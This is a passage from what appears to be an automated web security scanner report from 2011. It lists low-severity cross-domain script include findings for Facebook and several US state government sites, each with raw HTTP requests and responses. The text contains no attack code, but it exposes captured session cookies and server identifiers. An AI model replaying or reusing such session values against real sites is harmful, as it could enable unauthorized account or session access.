Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=IdulS; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.231.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:14 GMT
Content-Length: 165238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

20.97. http://www.facebook.com/note.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /note.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /note.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=DNT-Q; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.234.113
Connection: close
Date: Sat, 30 Apr 2011 12:32:06 GMT
Content-Length: 13344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/ys/r/ZxMFaX2bAu_.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

20.98. http://www.facebook.com/ohiodivisionofwatercraft  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ohiodivisionofwatercraft

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ohiodivisionofwatercraft HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=-xzbm; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.238.103
Connection: close
Date: Sat, 30 Apr 2011 12:32:07 GMT
Content-Length: 45188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

20.99. http://www.facebook.com/photo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /photo.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /photo.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=9bvPF; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fphoto.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.206.101
Connection: close
Date: Sat, 30 Apr 2011 12:32:11 GMT
Content-Length: 11367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/ys/r/ZxMFaX2bAu_.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

20.100. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http://www.utah.gov/pmn/sitemap/notice/67945.html&amp;layout=standard&amp;show_faces=false&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/pmn/sitemap/notice/67945.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.54
X-Cnection: close
Date: Sat, 30 Apr 2011 11:24:16 GMT
Content-Length: 8176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

20.101. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=cFyQm; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.200.118
Connection: close
Date: Sat, 30 Apr 2011 12:32:12 GMT
Content-Length: 10404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

20.102. http://www.georgia.gov/external/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /external/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12 HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Referer: http://ga.gov/00/channel_title/0,2094,4802_4969,00.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:46:11 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=AAF887C5B6B8BA6CE6E71C89D0C3E7B2;Path=/
Set-Cookie: vgnvisitor=2w45tw00bd800001jrJrQQ509e; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1063


<html>
<head>
<title>Redirecting...</title>
<link rel="stylesheet" type="text/css" href="/gta/mcm/files/cda.css">


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.103. http://www.georgia.gov/gta/translate/0,2678,4802,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /gta/translate/0,2678,4802,00.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gta/translate/0,2678,4802,00.html HTTP/1.1
Host: www.georgia.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=340E9C88A3B098642D07F0573D95018A; __utmz=212381186.1304125293.1.1.utmccn=(referral)|utmcsr=ga.gov|utmcct=/00/channel_title/0,2094,4802_4969,00.html|utmcmd=referral; __utma=212381186.1206636533.1304125293.1304125293.1304125293.1; __utmc=212381186; __utmb=212381186; vgnvisitor=2w45tM000-c00001jrJpFHTDH0;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:11:04 GMT
Server: Apache/1.3.29 (Unix)
Expires: Tue, 20 Jun 1995 04:13:09 GMT
Set-cookie: JSESSIONID=92D9408A882F8E8ED67382FFFFA727EB;Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 6212


<!-- Header -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
<link rel="stylesheet" href="/gta/mcm/files/MasterSiteCDA.css" type="text/css" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.104. http://www.georgiawildlife.com/node/1873  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.georgiawildlife.com
Path:   /node/1873

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /node/1873 HTTP/1.1
Host: www.georgiawildlife.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESSb3425e6a829e62b2674e77ae2f9b9d89=ktfftr78kjrcbla6tcejffsmp3; __utmz=47653809.1304163826.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=47653809.712167714.1304125303.1304125303.1304163826.2; __utmc=47653809; __utmb=47653809.1.10.1304163826;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:32:33 GMT
Server: Apache/2.0.55 (Red Hat)
X-Powered-By: PHP/5.1.2
Set-Cookie: SESSb3425e6a829e62b2674e77ae2f9b9d89=ktfftr78kjrcbla6tcejffsmp3; expires=Mon, 23 May 2011 16:05:53 GMT; path=/; domain=.georgiawildlife.com
Last-Modified: Sat, 30 Apr 2011 12:29:48 GMT
ETag: "bce6c0c54c3ee5e6027013b24732f311"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en"
   lang="en"
   dir="ltr
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

20.105. http://www.goccp.maryland.gov/lists/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goccp.maryland.gov
Path:   /lists/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lists/index.php HTTP/1.1
Host: www.goccp.maryland.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:36:00 GMT
Content-Type: text/html
Connection: close
Server: Apache/2
Set-Cookie: PHPSESSID=77254ae051338ab028c5b4d6ba57ff9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 14316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html><head>
<meta http-equiv="Cache-Control" content="no-cache, must-revalidate" />
<meta http
...[SNIP]...
<![endif]-->


   <script type="text/javascript" src="http://infogov1.ipower.com/javascript/news_scroller.js"></script>

<script type="text/javascript" src="http://infogov1.ipower.com/javascript/news_scroller_content.js"></script>
   <script type="text/javascript" src="http://infogov1.ipower.com/javascript/maryland_map.js"></script>
       <script type="text/javascript" src="http://infogov1.ipower.com/javascript/ruthsarian_utilities.js"></script>
<script type="text/javascript" src="http://infogov1.ipower.com/javascript/font_sizer.js"></script>
<script type="text/javascript" src="http://infogov1.ipower.com/javascript/redirection.js"></script>
<script type="text/javascript" src="http://infogov1.ipower.com/javascript/show_hide.js"></script>
...[SNIP]...
<!-- Script to send stats to Google Analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.106. http://www.gov.state.la.us/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gov.state.la.us
Path:   /index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.cfm HTTP/1.1
Host: www.gov.state.la.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:36:08 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30073


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
Logoo.gif','images/btnEmergPrepareo.gif','images/btnEmergVolunteero.gif','images/btnEmergDonateo.gif','images/btnIntEmailFriendo.gif','images/btnIntPrntrFrndlyo.gif','images/btnLogoGetGamePlno.gif')">
<script type="text/javascript" src="http://louisiana.gov/includes/banner/emergencybanner.js"></script>
...[SNIP]...
</center>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.107. http://www.in.gov/ai/errors/dwd_404.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /ai/errors/dwd_404.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ai/errors/dwd_404.html HTTP/1.1
Host: www.in.gov
Proxy-Connection: keep-alive
Referer: http://www.in.gov/dwd/WorkOne//?513f2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; BIGipServerwww.IN.gov-http=1916078090.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 15:03:33 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1916078090.20480.0000; expires=Sat, 30-Apr-2011 15:04:33 GMT; path=/
Content-Length: 22384

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 2252 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.108. http://www.in.gov/apps/options/email.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /apps/options/email.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /apps/options/email.aspx HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6095
Connection: close
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:57 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><title
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Ldm-gkAAAAAAKa53vbyfAcudSpTYD4ZxL8HMRdc">

</script>
...[SNIP]...

20.109. http://www.in.gov/apps/options/rate.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /apps/options/rate.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /apps/options/rate.aspx HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8313
Connection: close
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:57 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><title
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Ldm-gkAAAAAAKa53vbyfAcudSpTYD4ZxL8HMRdc">

</script>
...[SNIP]...

20.110. http://www.in.gov/apps/options/suggestion.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /apps/options/suggestion.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /apps/options/suggestion.aspx HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6297
Connection: close
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:58 GMT; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><title
...[SNIP]...
</script><script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6Ldm-gkAAAAAAKa53vbyfAcudSpTYD4ZxL8HMRdc">

</script>
...[SNIP]...

20.111. http://www.in.gov/core/faqs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /core/faqs.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /core/faqs.html HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:38:59 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:39:59 GMT; path=/
Content-Length: 17382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><!-- Instan
...[SNIP]...
<!-- END 9/23/10 -->


<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...

20.112. http://www.in.gov/dhs/3163.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dhs/3163.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dhs/3163.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache/2.2.13 (Unix) DAV/2
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerdhs_web_prod=2536835082.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 36537

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 3163 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.113. http://www.in.gov/dnr/6406.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dnr/6406.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dnr/6406.htm HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:39:00 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Language: en
Set-Cookie: BIGipServerwww.IN.gov-http=1882523658.20480.0000; expires=Sat, 30-Apr-2011 12:40:00 GMT; path=/
Content-Length: 34152

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><!-- PageID 6406 - pub
...[SNIP]...
<div id="scontainer">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

20.114. http://www.in.gov/dwd/WorkOne//  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /dwd/WorkOne//

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /dwd/WorkOne//?513f2 HTTP/1.1
Host: www.in.gov
